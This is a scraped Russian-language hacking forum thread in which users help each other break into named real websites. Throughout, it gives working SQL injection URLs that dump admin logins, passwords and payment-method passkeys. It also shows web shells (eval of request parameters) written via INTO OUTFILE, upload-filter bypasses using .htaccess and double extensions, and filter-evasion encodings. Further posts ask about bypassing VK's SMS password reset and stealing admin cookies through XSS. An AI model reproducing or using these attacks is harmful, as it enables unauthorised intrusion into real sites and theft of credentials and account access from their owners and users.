payment_method_name,
payment_class,
shopper_group_id,
payment_method_discount,
payment_method_discount_is_percent,
payment_method_discount_max_amount,
payment_method_discount_min_amount,
list_order,
payment_method_code,
enable_processor,
is_creditcard,
payment_enabled,
accepted_creditcards,
payment_extrainfo,
payment_passkey),2,3,4+from+jos_vm_payment_method

Выводится следующая ошибка:

4:1:PayPal:ps_paypal:5:0.00:0:0.00:0.00:0:PP:P:0:Y ::country."' ORDER BY country_2_code ASC"; $db1->query($q); $url = "https://www.paypal.com/cgi-bin/webscr"; $tax_total = $db->f("order_tax") + $db->f("order_shipping_tax"); $discount_total = $db->f("coupon_discount") + $db->f("order_discount"); $post_variables = Array( "cmd" => "_ext-enter", "redirect_cmd" => "_xclick", "upload" => "1", "business" => PAYPAL_EMAIL, "receiver_email" => PAYPAL_EMAIL, "item_name" => $VM_LANG->_('PHPSHOP_ORDER_PRINT_PO_NUMBER').": ". $db->f("order_id"), "order_id" => $db->f("order_id"), "invoice" => $db->f("order_number"), "amount" => round( $db->f("order_subtotal")+$tax_total-$discount_total, 2), "shipping" => sprintf("%.2f", $db->f("order_shipping")), "currency_code" => $_SESSION['vendor_currency'], "address_override" => "1", "first_name" => $dbbt->f('first_name'), "last_name" => $dbbt->f('last_name'), "address1" => $dbbt->f('address_1'), "address2" => $dbbt->f('address_2'), "zip" => $dbbt->f('zip'), "city" => $dbbt->f('city'), "state" => $dbbt->f('state'), "country" => $db1->f('country_2_code'), "email" => $dbbt->f('user_email'), "night_phone_b" => $dbbt->f('phone_1'), "cpp_header_image" => $vendor_image_url, "return" => SECUREURL ."index.php?option=com_virtuemart&page=checkout.result&order_id=".$db->f("order_id"), "notify_url" => SECUREURL ."administrator/components/com_virtuemart/notify.php", "cancel_return" => SECUREURL ."index.php", "undefined_quantity" => "0", "test_ipn" => PAYPAL_DEBUG, "pal" => "NRUBJXESJTY24", "no_shipping" => "1", "no_note" => "1" ); if( $page == "checkout.thankyou" ) { $query_string = "?"; foreach( $post_variables as $name => $value ) { $query_string .= $name. "=" . urlencode($value) ."&"; } vmRedirect( $url . $query_string ); } else { echo '
'; echo ''; foreach( $post_variables as $name => $value ) { echo ''; } echo '
'; } ?>:

Доступа к админке нет.

Это можно как-то раскрутить?

4:1:PayPals_paypal:5:0.00:0:0.00:0.00:0:PP:P:0:Y ::country

а это что?

4:1:PayPals_paypal:5:0.00:0:0.00:0.00:0:PP:P:0:Y ::country

а это что?


http://ethanol.li/techtab.php?id=-157+union+select+concat_ws(0x3a,payment_method_id,
vendor_id,
payment_method_name,
payment_class,
shopper_group_id,
payment_method_discount,
payment_method_discount_is_percent,
payment_method_discount_max_amount,
payment_method_discount_min_amount,
list_order,
payment_method_code,
enable_processor,
is_creditcard,
payment_enabled,
accepted_creditcards,
payment_extrainfo,
payment_passkey),2,3,4+from+ilseboc_joom.jos_vm_pa yment_method+limit+3,1+--+&uri=/products.php?id=157&lang=fr

я не понимаю... что те именно раскрутить? кажется ты уже все раскрутил

Здравствуйте!
Добыл мыло и хотел бы выслать на него пароль от "вконтакте" но не так все просто как казалось бы, от меня соц. сеть требует ввести номер телефона введенного при регестрации пользователем "вконтакте" и получит на этот номер код для смены пароля.
Вопрос:как можно обойти смс и выслать пароль на почту?
Взарание спс...

при заливке шелла в админке вот что мне вылетело:

Warning: imagesx(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: imagesy(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: imagecopyresampled(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 122

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 123

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 124

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 125

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 126

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 128


шелл не загрузился. есть ли какой-нибудь способ обхитрить php в это случае ?

при заливке шелла в админке вот что мне вылетело:

Warning: imagesx(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: imagesy(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: imagecopyresampled(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 122

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 123

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 124

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 125

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 126

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 128


шелл не загрузился. есть ли какой-нибудь способ обхитрить php в это случае ?

во-первых, загрузить корректный jpg(png,bmp,gif по вкусу) с кодом php-шелла - если расширение .php не меняется, ты смог это обойти или другой способ... то будет шелл.
во-вторых, судя по ошибкам - там картинки пережимаются скриптом, так что все пхп-теги и код будет утерян. Шелла не видать тебе.

при заливке шелла в админке вот что мне вылетело:

Warning: imagesx(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: imagesy(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: imagecopyresampled(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 122

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 123

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 124

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 125

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 126

Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 128


шелл не загрузился. есть ли какой-нибудь способ обхитрить php в это случае ?

Оно как бе пытается ресайзнуть картинку, но не получается, shell.php.jpg пробовал?

делаю запрос:
http://test.ru/news.php?s=news_date%20DESC&v=0&newscat_id=-1+UNION%20SELECT%20concat(username,0x3a,password), 2,3+from+admins

ответ:
Error: Illegal mix of collations for operation 'UNION'
File: /var/www/test.ru/htdocs/news.php
Line: 69
Query: SELECT newscat_id, newscat_title, newscat_dependency FROM newscats WHERE newscat_id=-1 UNION SELECT concat(username,0x3a,password),2,3 from admins LIMIT 1

Как я понимаю, это из-за кодировки. Как подправить запрос? Кодировка utf8

Unhex(hex(version()))

http://www.omega-pharma.be/EN/onafh_content.php?id=5

vot pomoqite nayti version() ili user() ?

http://www.omega-pharma.be/EN/onafh_content.php?id=5+and+substring(version(),1,1 )=4
или через ошибку попробуй

http://www.omega-pharma.be/EN/onafh_content.php?id=5

vot pomoqite nayti version() ili user() ?
http://www.omega-pharma.be/EN/onafh_content.php?id=(4)or(1,1)=(select(count(0)), concat((version()),floor(rand(0)*2))from(login)GRO UP BY 2)

Duplicate entry '4.1.21-standard1' for key 1

http://www.retention.se/news.asp?id=1'&pg=1

вот никак не могу раскрутить инъекцию. Максимум что удалось:
1) узнать количество полей
2) и добыть информацию с последней талблицы в бд с помощью "having"

ни версии, ни имени бд, пользователя никак. В чем может быть проблема?

spasibo..

a kak table_name i t.d ?

тож не выводит. Выводит только то что и при запросе

http://www.retention.se/news.asp?id=1&pg=1

без всяких там ошибок и т.д.

http://www.retention.se/news.asp?id=1'&pg=1

вот никак не могу раскрутить инъекцию. Максимум что удалось:
1) узнать количество полей
2) и добыть информацию с последней талблицы в бд с помощью "having"

ни версии, ни имени бд, пользователя никак. В чем может быть проблема?


http://www.retention.se/news.asp?id=1+or+1=convert(int,@@version)&pg=1

System information:
-----------------------------------------
system_user: retenti_groupse
@@version: Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Nov 24 2008 13:01:59
Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

db_name(): retenti_se


select фильтруется, думай

Подскажите как передать гет запрос с <? system.... ?> , что бы в логах скобочки не заменились на %3c %3e

Подскажите как передать гет запрос с <? system.... ?> , что бы в логах скобочки не заменились на %3c %3e
<?php file_get_contents('http://site.ru/<?php eval(stripslashes($_REQUEST[cmd]));?>');?>

Всем привет! наткнулся на такую ошибку...
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 42 in /home/site/public_html/php/config/functions.php on line 931
Урл вида: http://.sita.net/index.php?id=11&new=-6
Можно ли провести инъекцию :confused:

pinch
http://www.retention.se/news.asp?id=1+and+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES)&pg=1

и далее по сценарию

======================

Pashkela
Опять у тебя ненужные навороты. Они запутывают людей
Зачем
http://www.retention.se/news.asp?id=1+or+1=convert(int,@@version)&pg=1
Если
http://www.retention.se/news.asp?id=1+or+1=@@version&pg=1

спасибо. оказывается фильтры на: select, or, OR, --
а я из мухи слона делаю

Потому что это тхт файл который не выполняется =/
Надо с раширением php залить.

Может, потому что там file_get_contents, а не инклуд?

Бгг да точно) но как бы он его как-то залил... логика значит надо залить с другим расширением ато да читалка)

Такая ситуация:
Есть PhpMyAdin права полный Root
Делаю запрос вида
select '<? @include("http://site.ru/files/shell.txt"); ?>' into outfile 'D:/WWW/files/shell.php';
Создаеться файл .php, но когда захожу на него, там пустой белый лист!!!

А когда делаю запрос
select '<? phpinfo(); ?>' into outfile 'D:/WWW/files/info.php';
выводиться полный phpinfo!!

что может быть не так?

попробуй залить include($_GET[file]) ...

я извиняюсь, мой пост затерялся, поетому спрошу ещё раз.

']Потому что это тхт файл который не выполняется =/
Надо с раширением php залить.
с php вобще ничего не показывает.
Может, потому что там file_get_contents, а не инклуд?
возможно. как в этом случае можно глянуть какая функция используется.

Такая ситуация:
Есть PhpMyAdin права полный Root
Делаю запрос вида
select '<? @include("http://site.ru/files/shell.txt"); ?>' into outfile 'D:/WWW/files/shell.php';
Создаеться файл .php, но когда захожу на него, там пустой белый лист!!!

А когда делаю запрос
select '<? phpinfo(); ?>' into outfile 'D:/WWW/files/info.php';
выводиться полный phpinfo!!

что может быть не так?


allow_url_include off скорее всего

.:[melkiy]:.
Я с табой соглашусь!

']попробуй залить include($_GET[file]) ...

А по подробнее можно. А то я раньше таким не рользовался!

.:[melkiy]:.
Я с табой соглашусь!



А по подробнее можно. А то я раньше таким не рользовался!


лучше eval($_GET['shell']);


я извиняюсь, мой пост затерялся, поетому спрошу ещё раз.


с php вобще ничего не показывает.

возможно. как в этом случае можно глянуть какая функция используется.


там не инклюд, а читалка

залить скрипт аплоада и через него лить уже обычный шелл

ЗЫ:Не трезв...

попугай, eval($_GET['shell']); тоже ничего не дал. Ошибки только выдает! типа
Parse error: syntax error, unexpected '<' in D:\WWW\files\files.php(1) : assert code(1) : eval()'d code on line 1

попугай, eval($_GET['shell']); тоже ничего не дал. Ошибки только выдает! типа
Parse error: syntax error, unexpected '<' in D:\WWW\files\files.php(1) : assert code(1) : eval()'d code on line 1


select '<? eval(stripslashes($_REQUEST[\'var\'])); ?>' into outfile 'D:/WWW/files/shell.php';

Потом http://site.com/files/shell.php?var=phpinfo();

<?php file_get_contents('http://site.ru/<?php eval(stripslashes($_REQUEST[cmd]));?>');?>

Спасибо большое. Но чё то или я туплю или даже хз, но в логах ngnix , но в логах чё то не появляется мой запрос :(

http://www.meningrey.net/%5c/
Что это за уязвимость такая? Где об этом можно почитать?

есть шелл с парольом..
как моjно наыти пароль ?
и пароль изменилось не стандартниы..
напримерь в wso парол root а здес что то друqое ..
как наыти ??

http://www.meningrey.net/%5c/
Что это за уязвимость такая? Где об этом можно почитать?


читалка обычная походу.. и mod_rewrite обычный

Потом http://site.com/files/shell.php?var=phpinfo();

Да phpinfo то выводит без проблем!!
П ричем var не работает, только cmd!

И что ещо можно сделать через команду cmd ??

подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов

подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов

ммм.. а как скрипт будет различать опасные файлы по твоему?

он же работает на стороне клиента..исходники ему не видны :rolleyes:

подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов

http://slil.ru/29081007 вот, если я правильно понял. Ищит залитые шеллы на сторонних сайтах по их имени (r57.php,c99.php,c100.php и тд).

Если на своем сервере нужно найти модифицированные файлы или шеллы, то вот http://slil.ru/29081093

Подскажите дальнейшие действия, есть доступ к phpinfo.php там естесвенно подробная инфа и пути к сайту что дальше делать? может ссылку на какую нибудь статью или еще что то... проверка всего сайта не sql , php иньекций и не Xss не вывело

Подскажите дальнейшие действия, есть доступ к phpinfo.php там естесвенно подробная инфа и пути к сайту что дальше делать? может ссылку на какую нибудь статью или еще что то... проверка всего сайта не sql , php иньекций и не Xss не вывело
простое phpinfo тебе ничего особо полезного не даст.

Не смог раскрутить. Кто что скажет?
chatmovil.terra.es/index.php?section=channel_list&viewing_category_type=1

http://chatmovil.terra.es/index.php?section=channel_list&viewing_category_type=1+and+(select+1+from+(select +count(0),concat((select+version()),floor(rand(0)* 2))+from+information_schema.tables+group+by+2)a)--+

что-то фантазии не хвататет:

http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36

что-то фантазии не хвататет:

http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36

Это MSSQL, скорее всего фильтруется, потому что при 1 or 1=@@version-- просто становится недоступен сайт

b82a комментарий если убрать, то доступен, вылетает ошибка

значит фильтруется --

попробуй:
#
%-%-
%2D%2D

del

http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9+--+

file_priv:Y

Не могу найти админку, phpmyadmin или ftp.
Не могу прочитать файлы чтобы найти путь куда залить shell.

Что можете посоветовать?

подскажите плиз по скуле. в общем подобрал все нужное и колво столбцов и имя таблицы. делаю запрос на несуществующее поле - вылетает ошибка (как положено) Ввожу запрос правильный (через скулю) он не выводит информацию из БД а тупо отображает то что было если бы я не вставлял скулю. ' UNION SELECT 1, login FROM billing_users LIMIT 0,1 -- выдает страницу без изменений ' UNION SELECT 1, login1 FROM billing_users LIMIT 0,1 -- A Database Error Occurred Error Number: 1054 Unknown column 'login1' in 'field list' SELECT login, email FROM billing_users WHERE login = '' UNION SELECT 1, login1 FROM billing_users LIMIT 0,1 -- ' OR email = '' То есть запрос вроде верный в 1ом случае а он ничего не выводит, ни на страницу, не в исходнике =( Это я так понимаю Blind SQL Injection и тут методом перебора только ? или как?

нет не блинд....
причины:
1)таблица находится в другой базе
2)таблица пустая
3)проблемы с кодировками

решение:
1)придется смириться
2)для mysql4
' UNION SELECT 1, count(*) FROM billing_users--
для mysql5
' UNION SELECT 1, table_rows FROM information_schema.tables where table_name= 'billing_users'--
если вывело 0 значит таблица пустая
3)' UNION SELECT 1, unhex(hex(login)) FROM billing_users LIMIT 0,1 --
' UNION SELECT 1, aes_decrypt(aes_encrypt(login,12),12) FROM billing_users LIMIT 0,1 --

http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9+--+ file_priv:Y Не могу найти админку, phpmyadmin или ftp. Не могу прочитать файлы чтобы найти путь куда залить shell. Что можете посоветовать?

можно с BENCHMARK поколдовать чтоб вывело полный путь

http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9+--+

file_priv:Y

Не могу найти админку, phpmyadmin или ftp.
Не могу прочитать файлы чтобы найти путь куда залить shell.

Что можете посоветовать?
нету у тебя там файл_прива, дядя

http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(':',user(),user ,file_priv),6,7,8,9 from mysql.user where user='tecmath'--+
tecmath@localhost:tecmath:N

Здравствуйте всем!
Sql-inj начал заниматься недавно, всё очень хорошо получается, но возник вопрос есть ли софт, который может помочь сдампипть базу через inj?

Тебе под MySql или MSSql?

Тебе под MySql или MSSql?

Расскажи про ту и ту базу если не сложно.

что-то фантазии не хвататет:

http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36

При твоем запросе вылетает ошибка "Microsoft VBScript runtime error '800a000d' ". Это означает, что используется Microsoft Jet Database Engine и запросы передается на очень низком уровне, на которые вряд ли получится повлиять.

Для EoGeneo:
https://forum.antichat.ru/showpost.php?p=236188&postcount=3 - автоматический частичный\полный дампинг БД (mssql, mysql-5.*)
и тут еще
https://forum.antichat.ru/thread148915.html как одни из многих функций есть и дампинг

Подскажите плиз, делаю всё как тут http://bug-track.ru/showpost.php?p=49&postcount=1

т.е. имеется аплоадер файлов, + phpinfo()

upload php запрещён. но я могу заливать любые другие файлы
и .htaccess, я вставил туда AddType application/x-httpd-php .html .gif

но сервер не выполняет как php, а отдаёт файл на закачку. ещё в phpinfo сказано что php подключен как CGI, может поэтому не раб? тода подсажите плиз как в CGI PHP подрубить другие расширрнеия с помощью .htaccess

но сервер не выполняет как php, а отдаёт файл на закачку.
скорей всего, причиной является хтацесс с php_flag engine off

скорей всего, причиной является хтацесс с php_flag engine off

спс, может быть. ша поишу инклудов в двиге, токо трабла в том как слить сайт полность (скрипты)

подскажите плиз шелл или скрипт чтобы слить скрипты с сайта, wso2.4 не пакует в архив ((

Нужно поломать сайт с аунтификацией такого вида а-ля alert (JS). На вид подумал что сама аунтификация довольно старая, и возможно есть уязвимости.

Пикча формы, на фоне - страница, открывающаяся после неуспешного входа (адреса счел нужным скрыть)
http://s58.radikal.ru/i160/1005/34/9cb26e6c3bc2.png

Такая штука отображается при доступе к фаилу http://site/admin.php. На пхп фаил не похоже, судя по форме неудачи, прописано где то в апаче.

brutus-aet2 ом прогонять пробовал, выдает бред при разных настройках. По словарю он выдает каждый раз новые пароли, по подбору - тоже.

Спасибо.

ЗЫ: Поиск юзал. Просьба постить только по теме.
ЗЗЫ: Если запостил тему не в том разделе, просьба переместить и отправить ссылку в ЛС.
ЗЗЗЫ: Ломаю не ради интереса и не ради того, чтобы "нагадить".

Пишу в .htaccess
RemoveHandler .php, и все равно выполняеться код пхп! Как решить?

Нужно поломать сайт с аунтификацией такого вида а-ля alert (JS). На вид подумал что сама аунтификация довольно старая, и возможно есть уязвимости.

Пикча формы, на фоне - страница, открывающаяся после неуспешного входа (адреса счел нужным скрыть)
http://s58.radikal.ru/i160/1005/34/9cb26e6c3bc2.png

Такая штука отображается при доступе к фаилу http://site/admin.php. На пхп фаил не похоже, судя по форме неудачи, прописано где то в апаче.

brutus-aet2 ом прогонять пробовал, выдает бред при разных настройках. По словарю он выдает каждый раз новые пароли, по подбору - тоже.

Спасибо.

ЗЫ: Поиск юзал. Просьба постить только по теме.
ЗЗЫ: Если запостил тему не в том разделе, просьба переместить и отправить ссылку в ЛС.
ЗЗЗЫ: Ломаю не ради интереса и не ради того, чтобы "нагадить".


мдаааа, ты уже топик вроде создавал, и тебе там совершенно ясно ответили, зачем здесь пишешь?!
http://en.wikipedia.org/wiki/Basic_access_authentication
alert() тут не причём, это не javascript.

Пишу в .htaccess
, и все равно выполняеться код пхп! Как решить?
А в комбинации с RemoveType?

upload php запрещён. но я могу заливать любые другие файлы
и .htaccess, я вставил туда AddType application/x-httpd-php .html .gif



Попробуй так:

RemoveType .html .gif
AddType application/x-httpd-php .html .gif

А в комбинации с RemoveType?
я тебя люблю) бес комбинации работает, то что надо! ;)

спс, может быть. ша поишу инклудов в двиге, токо трабла в том как слить сайт полность (скрипты)

подскажите плиз шелл или скрипт чтобы слить скрипты с сайта, wso2.4 не пакует в архив ((
pclzip.lib.php

что-то фантазии не хвататет:

http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36

Это MSSQL, скорее всего фильтруется, потому что при 1 or 1=@@version-- просто становится недоступен сайт

b82a комментарий если убрать, то доступен, вылетает ошибка

значит фильтруется --
попробуй:
#
%-%-
%2D%2D

Вставлю свои 5 копеек...

http://www.freeukdatingsite.com/imagePop.asp?Item=@@version
http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+union+select+null,@@v ersion,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null

Напридумывали каких-то фильтров)

зы. Может я слишком плоско мыслью, но я не понимаю, зачем писать попробуй то..сё, если человек отписал с урл...

Имею доступ к phpmyadmin. На сервер установлен форум phpbb, можно ли как то управлять коталогом / из под рут

Имею доступ к phpmyadmin. На сервер установлен форум phpbb, можно ли как то управлять коталогом / из под рут

Попробуй залить шелл через пхп май админ если есть разрешение на into outfile

Всем привет!
Интересует вопрос, какие способы есть в шаред хостингах для просмотра каталога(или файла), других пользователей
например:
/home/andrei/public_html/
/home/irina/public_html/
бывает часто что я не имею права на просмотр каталога и все то что внутри,

Попробуй залить шелл через пхп май админ если есть разрешение на into outfile
Намного лучше, залогинившись админом на форуме (расшифровав его хэш или временно изменив на свой), залить шелл через phpbb (в ветке по ней есть точное описание, если нужно).

Всем привет!
Интересует вопрос, какие способы есть в шаред хостингах для просмотра каталога(или файла), других пользователей
например:
/home/andrei/public_html/
/home/irina/public_html/
бывает часто что я не имею права на просмотр каталога и все то что внутри,
Я так понял, что ты тоже зареган на подобном серваке и можешь работать токо в своей директории. Наверно и консолька есть...
Просмотр директорий других юзеров ты можешь добиться:
1) повышением прав на этом серваке, если найдешь соответствующий эксплоит под данную систему;
2) т.к. это web-хостинг, то можно попытаться взломать сайты хостящиеся здесь же;
3) если есть подключения к бд, то проверить возможность чтения файлов через load_file.

пока больше на ум ничего не приходит

ребят делаю запрос

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='tbl_group_admin')--

результат

Ligne 1 : syntaxe incorrecte vers ')'.

делаю

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=CHAR(116,98,108,95,103,11 4,111,117,112,95,97,100,109,105,110))--

результат

a fonction char requiert 1 arguments.

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=0x74626c5f67726f75705f616 46d696e)--

syntaxe incorrecte vers ')'

что посоветуете?

Есть сайт, делаю запрос:
http://test/news.php?id=-1+union+select+1,user(),3,4--
Выводит:
adeoo3@10.1.1.17

Хочу узнать права на чтение/запись файлов, делаю запрос:
http://test/news.php?id=-1+union+select+1,file_priv,3,4+from+mysql.user+whe re+user='adeoo3'--
Выводит:
SELECT command denied to user 'adeoo3'@'10.1.1.17' for table 'user'
Что это значит???

ребят делаю запрос

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='tbl_group_admin')--

результат

Ligne 1 : syntaxe incorrecte vers ')'.

делаю

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=CHAR(116,98,108,95,103,11 4,111,117,112,95,97,100,109,105,110))--

результат

a fonction char requiert 1 arguments.

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=0x74626c5f67726f75705f616 46d696e)--

syntaxe incorrecte vers ')'

что посоветуете?


а если без топ 1 попробовать что выводит?

Есть сайт, делаю запрос:
http://test/news.php?id=-1+union+select+1,user(),3,4--
Выводит:
adeoo3@10.1.1.17

Хочу узнать права на чтение/запись файлов, делаю запрос:
http://test/news.php?id=-1+union+select+1,file_priv,3,4+from+mysql.user+whe re+user='adeoo3'--
Выводит:
SELECT command denied to user 'adeoo3'@'10.1.1.17' for table 'user'
Что это значит???

Нетдоступа к таблице майск.юсер, попробуй перечитапть файл через load_file или залить в /tmp и перечитать оттуда.

ребят делаю запрос (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='tbl_group_admin')-- результат Ligne 1 : syntaxe incorrecte vers ')'. делаю (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=CHAR(116,98,108,95,103,11 4,111,117,112,95,97,100,109,105,110))-- результат a fonction char requiert 1 arguments. (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=0x74626c5f67726f75705f616 46d696e)-- syntaxe incorrecte vers ')' что посоветуете?

надо так:
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bch ar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar( 111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97) %2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--

Есть активная xss. Как через яваскрипт сделать размер ифрейма на весь экран?
p.s. С помощью этого <iframe src=//сайт>

http://test/news.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4--
не катит.

Значит у меня однозначно нет прав?

а если без топ 1 попробовать что выводит?

тот же результат

надо так:
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bch ar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar( 111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97) %2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--

а можно без url encode?

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)+char(98)+char(1 08)+char(95)+char(103)+char(114)+char(111)+char(11 7)+char(112)+char(95)+char(97)+char(100)+char(109) +char(105)+char(110))--

http://test/news.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4--
не катит.

Значит у меня однозначно нет прав?

скорее всего да.

2 pinch

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= char(116)+char(98)+char(108)+char(95)+char(103)+ch ar(114)+char(111)+char(117)+char(112)+char(95)+cha r(97)+char(100)+char(109)+char(105)+char(110))--

syntaxe incorrecte vers 'char'.

http://test/news.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4--
не катит.

Значит у меня однозначно нет прав?

Попробуй

load_file(CHAR(47,101,116,99,47,112,97,115,115,119 ,100))

Попробуй

load_file(CHAR(47,101,116,99,47,112,97,115,115,119 ,100))

Из прошлого запроса видно что ковычка не фильтруется.

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= char(116)+char(98)+char(108)+char(95)+char(103)+ch ar(114)+char(111)+char(117)+char(112)+char(95)+cha r(97)+char(100)+char(109)+char(105)+char(110))-- syntaxe incorrecte vers 'char'.

на encode не пробовал
заменив "+" на "%2B"
скорее всего причина в этом

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bch ar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar( 111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97) %2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--

2 pinch

nea,тот же результат =(

интересно может ссылку дашь....

интересно может ссылку дашь....

в личку

А мне кто поможет?
Есть активная xss. Как через яваскрипт сделать размер ифрейма на весь экран?
p.s. С помощью этого <iframe src=//сайт>

мдаааа, ты уже топик вроде создавал, и тебе там совершенно ясно ответили, зачем здесь пишешь?!
http://en.wikipedia.org/wiki/Basic_access_authentication
alert() тут не причём, это не javascript.
Создавать то создавал, но потом в описании раздела увидел, что нельзя, через день удалили тред.

Кинули ссылку на ман по тому как сделать, а я пока скорее нахожусь на уровне скрипт - кидди)

Из википедии понял только что шифрование на Base64, никаких уязвимостей там не написано.

ЗЫ: мой вопрос на странице 1293

Подскажите как вытащить cookies с сайта, есть XSS уязвимость, задача вытащить cookies админа, испробавала пока на себе (document.cookie(JS)) нормально вытаскивает и записывает но одна проблема всего 4 значения а их там 6... т.е не все полностью тащит, есть еще какие то варианты?

Оказывается надо было просто аворитизироваться, и появится все параметры, вопрос закрыт

Исправьте запрос, никак не могу вывести таблицу
http://blocked/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admi n_password),2,3+from+se_admins

